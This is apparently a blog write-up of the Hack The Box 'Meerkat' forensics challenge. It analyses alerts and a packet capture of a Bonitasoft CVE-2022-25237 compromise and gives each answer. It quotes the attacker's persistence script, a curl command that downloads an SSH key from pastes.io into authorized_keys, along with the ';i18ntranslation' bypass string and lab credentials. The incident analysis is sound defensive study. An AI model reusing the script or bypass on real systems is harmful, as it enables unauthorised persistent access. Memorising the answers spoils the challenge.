Htb Sherlock Meerkat

Writeup of htb sherlock Meerkat

rating: easy

  1. We believe our Business Management Platform server has been compromised. Please can you confirm the name of the application running?

we can filter the meerkat-alerts.json with…

1
2
3
4
cat meerkat-alerts.json |jq |grep signature | grep -v python


the bmp name is in the signature

ans: Bonitasoft

  1. We believe the attacker may have used a subset of the brute forcing attack category - what is the name of the attack carried out?

From the meerkat-alerts.json and from pacap file we can see that there was alot of alerts on python-requests and we can see the requests tested different creds. This is possible Credential Stuffing

ans: Credential Stuffing

  1. Does the vulnerability exploited have a CVE assigned - and if so, which one?

Here use the same command as question1 , the cve is in the signature

ans: CVE-2022-25237

  1. Which string was appended to the API URL path to bypass the authorization filter by the attacker’s exploit?

in this case i used tshark to analyse the pcap.

1
2
3
4
tshark -r meerkat.pcap -Y "http.request.method == POST" -T fields -e http.request.uri | grep -i api


filter post requests , get the url path and grep for the api endpoints

i18ntranslation

  1. How many combinations of usernames and passwords were used in the credential stuffing attack?

here we filter post requests, the we remove “username=install&password=install&_l=en” , i also removed “/bonita/API/portal/page/;i18ntranslation” and “/bonita/API/pageUpload;i18ntranslation?action=add” which were not login requests then pipe the output to uniq

1
2

tshark -r meerkat.pcap -Y "http.request.method == POST" -T fields -e http.request.uri -e  http.file_data  | grep -v "username=install&password=install&_l=en" | grep -v "/bonita/API/portal/page/;i18ntranslation" | grep -v "/bonita/API/pageUpload;i18ntranslation?action=add" | uniq | wc -l

ans: 56

  1. Which username and password combination was successful?

From the query above without uniq , the last combination has a different http.file_data , yoll have to check through wireshark but the ans is …

ans: seb.broom@forela.co.uk:g0vernm3nt

  1. If any, which text sharing site did the attacker utilise?

As i was analysing the pcap using this query we can get the full uri. the url is part of parameters

1
tshark -r meerkat.pcap  -T fields -e  http.request.full_uri | uniq

ans: pastes.io

  1. Please provide the filename of the public key used by the attacker to gain persistence on our host.

Visiting the url we get a bash script with the following content… hxxps[://]pastes[.]io/raw/bx5gcr0et8

1
2
3
#!/bin/bash
curl https://pastes.io/raw/hffgra4unv >> /home/ubuntu/.ssh/authorized_keys
sudo service ssh restart

ans: hffgra4unv

  1. Can you confirmed the file modified by the attacker to gain persistence?

see above

ans: /home/ubuntu/.ssh/authorized_keys

  1. Can you confirm the MITRE technique ID of this type of persistence mechanism?

this technique of using ssh authorized keys has id T1098.004. You can get this by visiting mitre website or googling or use chatgpt idc.

ans: T1098.004

Licensed under CC BY-NC-SA 4.0
Built with Hugo
Theme Stack designed by Jimmy